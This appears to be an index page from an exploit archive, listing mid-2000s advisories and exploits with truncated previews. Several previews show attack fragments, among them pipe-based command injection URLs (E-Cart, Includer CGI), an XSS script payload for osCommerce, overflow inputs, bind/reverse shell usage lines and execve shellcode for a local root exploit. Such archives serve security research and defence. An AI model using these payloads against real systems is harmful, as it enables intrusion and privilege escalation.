Sql Injection in CJ Ultra Plus v1.0.3-1.0.4

ADVISORY Sql Injection in CJ Ultra Plus v1.0.3-1.0.4? "My God, it's full of stars" - c MwNN Vulnerable code is in out.php ---code begin-- ... if isset$perm $query = "select a1, a2 from trade where a1 = '$perm'"; -muhahaha $result = mysqlquery$query; if!$result errormessagesqlerror; ... ---code...

E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl Example added if code doesn't work for ya: http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductoresdvd&art=reproductordvp-ns315.dat|uname%20-a| /str0ke info: [email protected] use IO::Socket; print "\n\n www.badroot.org \n\n"; print...

GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)

/ cybertronicatgmxdotnet offset fixed! cybertronic @ GoodTech $ gcc -o goodtechexpl goodtechexpl.c cybertronic @ GoodTech $ ./goodtechexpl Usage ----- Bindshell ./goodtechexpl Reverseshell ./goodtechexpl cybertronic @ GoodTech $ ./goodtechexpl 192.168.2.103 / / / / / / / / / / / / / / / / / / /...

OneWorldStore - DisplayResults.asp SQL Injection

OneWorldStore - DisplayResults.asp SQL Injection source: https://www.securityfocus.com/bid/13249/info OneWorldStore is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful...

sash <= 3.7 Local Buffer Overflow Exploit

No description provided by source. / sash-3.7 buffer overflow in c argyment written by lammat for practice purposes http://grpower.ath.cx [email protected] gdb r -c perl -e 'print "A"x10256' The program being debugged has been started already. Start it from the beginning? y or n y Starting program...

MS Internet Explorer ""mshtml.dll"" CSS Parsing Buffer Overflow

No description provided by source. / Taken from http://www.securiteam.com/exploits/5NP042KF5A.html The exploit will create a .CSS file that should be included in an HTML file. When a user loads the HTML file, Internet Explorer will try to parse the CSS and will trigger the buffer overflow. /...

The Includer CGI <= 1.0 Remote Command Execution

Exploit for cgi platform in category web applications ================================================ The Includer CGI = 1.0 Remote Command Execution ================================================ Remote Command Execution on: Example I.: www.host-vulnerable.com/includer.cgi?|id| Example II.:...

formmail23.txt

-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: Form Mail Script FS Version: Location: Poland Email: groszynskif gmail com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --...

mixedSQL.txt

Postnuke all versions + pnphpbb =1.2 sql injection - jocanor Author: Jocanor Date: 01-03-2k5 1. -----------introduction--------. Postnuke is an open source CMS content management system, originally based in php-nuke. www.postnuke.com pnphpbb is a module for postnuke based in popular forum system...

osCommerceXSS.txt

Hello All, I have discovered XSS vulnerability in: osCommerce 2.2-MS2 Authors Site: http://www.oscommerce.com/ +-Example:--------------------------------------------------+ XSS: http://www.victimsite.com/contactus.php?&name=1&email=1&enquiry=%3C/textare a%3E%3Cscript%3Ealert'w00t';%3C/script%3E...

Plugins can be used to load privileged content — Mozilla

Plugins such as flash can be used to load privileged content into a frame. Once loaded various spoofs can be applied to get the user to interact with the privileged content. Michael Krax's "Fireflashing" example demonstrates that an attacker can open about:config in a frame, hide it with an opaci...

Typespeed 0.4.1 - Local Format String

// source: https://www.securityfocus.com/bid/12569/info typespeed is prone to a local format string vulnerability. Successful could allow privilege escalation. / Proof of Concept local exploit for typespeed tool "enva" content: include include int mainint argc, char argv char addrptr = NULL;...

[NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities

Vulnerable Systems: ---------------- vBulletin version 3.0 up to and including version 3.0.4 Immune systems: ---------------- vBulletin version 3.0.5 vBulletin version 3.0.6 Vulnerable code in forumdisplay.php : if $vboptions'showforumusers' . . . . if $bbuserinfo'userid' . . . . $comma = ', ';...

MyPHP Forum 1.0 SQL Injection Exploit

No description provided by source. /==========================================/ // GHC - MyPHP Forum - ADVISORY // Product: MyPHP Forum // Version: 1.0 // URL: http://www.myphp.ws // VULNERABILITY CLASS: SQL injection /==========================================/ example of exploit...

MyPHP Forum 1.0 - SQL Injection

MyPHP Forum 1.0 - SQL Injection /==========================================/ // GHC - MyPHP Forum - ADVISORY // Product: MyPHP Forum // Version: 1.0 // URL: http://www.myphp.ws // VULNERABILITY CLASS: SQL injection /==========================================/ example of exploit...

Setuid perl PerlIO_Debug() overflow

Exploit for linux platform in category local exploits =================================== Setuid perl PerlIODebug overflow =================================== / Copyright Kevin Finisterre Setuid perl PerlIODebug overflow Tested on Debian 3.1 perl-suid 5.8.4-5 11:07:20 corezion: who is tha man wit...

trn-test.txt

/ /usr/bin/trn local root exploit By ZzagorR - http://www.rootbinbash.com / / sh-2.05b$ ./trn usage : ./trn ret buf example : ./trn 0xbfffff64 + mandrake 9.2 = 0xbfffff96 + slackware 10.0.0= 0xbfffff98 + slackware 9.1.0= 0xbfffff84 sh-2.05b$ sh-2.05b$ ./trn 0xbfffff84 128 BOO % 128 RET % bfffff84...

IEurlflaw.txt

All, The following very simple! code calls a URL in the browser window but fails to update the address bar in IE. Looks like the form submission is suspended with the interrupt of the 'window.alert' call. IE then fails to correctly handle. Might be helpful in facilitating phishing style attacks...

AWStats 6.0 6.2 - configdir Remote Command Execution (C)

AWStats 6.0 6.2 - configdir Remote Command Execution C / AwStats exploit by Thunder, [email protected] This exploit makes use of the remote command execution bug discovered in AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script. The script does not sanitise correctly the us...

Exim <= 4.41 dns_build_reverse Local Exploit PoC

Exploit for linux platform in category local exploits ================================================ Exim int main int argc, char argv static char shellcode= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"...